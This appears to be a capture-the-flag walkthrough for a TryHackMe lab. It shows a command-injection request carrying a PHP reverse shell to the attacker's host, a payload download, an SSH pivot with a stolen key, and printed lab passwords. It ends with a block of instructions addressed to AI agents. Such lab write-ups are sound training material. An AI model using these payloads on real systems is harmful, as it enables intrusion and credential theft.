# ContainMe **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

**Burp Request** ``` GET /index.php?path=;id HTTP/1.1 Host: 10.10.108.33 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ```

## Initial Shell **Kali** ``` nc -lvnp 1337 ``` **Burp Request** ``` GET /index.php?path=;php+-r+'$sock%3dfsockopen("$KALI",1337)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1 Host: 10.10.128.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ```

Get autocomplete ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` **Victim** ``` find / -perm -u=s -type f 2> /dev/null /usr/share/man/zh_TW/crypt mike ```

**Kali** ``` git clone https://github.com/andrew-d/static-binaries.git cd static-binaries/binaries/linux/x86_64 python2 -m SimpleHTTPServer 81 ``` **Victim** ``` cd /tmp/ wget http://$KALI:81/nmap chmod +x nmap ./nmap 172.16.20.0/24 -Pn ```

Mike has a ssh key so I tried logging into the other server with that and it worked. **Victim** ``` ssh mike@172.16.20.6 -i /home/mike/.ssh/id_rsa ```

## **Privilege Escalation** **Victim** ``` ss -ltp ```

Password was password, just guessed it. **Victim(mysql)** ``` mysql -ppassword show databases; use accounts; select * from users ; ```

**Victim**

su root
Password: bjsig4868fgjjeog

**Victim**

cd /root
unzip mike.zip
Password: WhatAreYouDoingHere

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/containme.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.